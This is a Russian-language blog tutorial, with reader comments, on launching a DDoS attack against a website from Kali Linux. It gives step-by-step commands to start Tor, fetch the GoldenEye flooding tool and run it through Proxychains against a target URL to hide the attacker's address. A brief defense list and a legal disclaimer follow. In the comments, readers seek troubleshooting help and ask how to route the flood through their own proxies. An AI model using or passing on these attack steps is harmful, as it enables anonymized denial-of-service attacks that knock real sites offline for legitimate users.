Инструменты DDOS способны загружать большие нагрузки на HTTP-серверы и ставить их на колени, исчерпывая ресурсы.
Что такое DDOS-атака?
Тип атаки, при которой несколько скомпрометированных систем атакуют одну цель, которая запрещает доступ к службе законных пользователей целевой системы.
В этом учебном пособии по Kali Linux мы обсудим выполнение DDOS-атаки с Kali Linux.
Необходимые инструменты
- EtherApe – графический сетевой монитор, который графически отображает сетевую активность. Хосты и ссылки изменяются по размеру с трафиком. Отображаются цветные протоколы.
- Tor-Tor позволяет клиентам и реле предлагать скрытые сервисы. То есть вы можете предложить веб-сервер, SSH-сервер и т. д., Не раскрывая свой IP-адрес своим пользователям.
- Proxychains – Последняя версия Proxychains поддерживает прокси-серверы SOCKS5, SOCKS4 и HTTP CONNECT. Proxychains можно смешивать с разными типами прокси.
- GoldenEye – приложение GoldenEye для python, предназначенное для тестирования безопасности.
Как выполнить атаку DDOS на сайт
Шаг 1: Запустите etherape :
root @ kali: ~ # etherape он предложит всплывающее окно, которое графически отображает сетевую активность. Шаг 2: Запуск службу TOR: root@kali:~# service tor start
Шаг 3: Загрузите Goldeneye https://github.com/jseidl/GoldenEye
root @ kali: ~ # wget https://github.com/jseidl/GoldenEye
Шаг4: После загрузки Разархивируйте его
root @ kali: ~ # unzip GoldenEye-master.zip
Шаг 5: Запустите атаку
root@kali:~/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com
Если вы столкнулись с проблемами выполнения или другими проблемами совместимости, не стесняйтесь комментировать.
Общая защита от атаки DDOS
- Снижение скорости подключения IP.
- Используйте IDS,брандмауэры веб-приложений.
- Tweak Connection для IP-порога.
- Использование хостингов, которые предлагают услугу "защита сайта от взлома"
¯\_(ツ)_/¯
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.
Шаг 3: Загрузите Goldeneye https://github.com/jseidl/GoldenEye
root @ kali: ~ # git clone https://github.com/jseidl/GoldenEye.git
Шаг4: После загрузки Разархивируйте его
root @ kali: ~ # cd GoldenEye
?
good
ty
То есть, CF (Cloud Flare), как защиту от DOS, DDOS, вы решили не рассматривать даже?
Всмысле? Это пример атаки, а не обзор WAF
Proxychains команда не найдена. Как решить всё делал по инструкции.
Если это вопрос – что дает вывод
ls -l
?Ошибкак 404 как установить та ?
на гитхабе?
Как отменить доосс атаку с этого сайта помогите пожалуйста очень прошу Вас!
С какого сайта?) Сайт не Дидосит 😀
u menya problema ya delayu dalche tam pihhitsya “Shutting down GoldenEye”
как поставить свои прокси чтобы с них шёл ддос?
а https снесёт?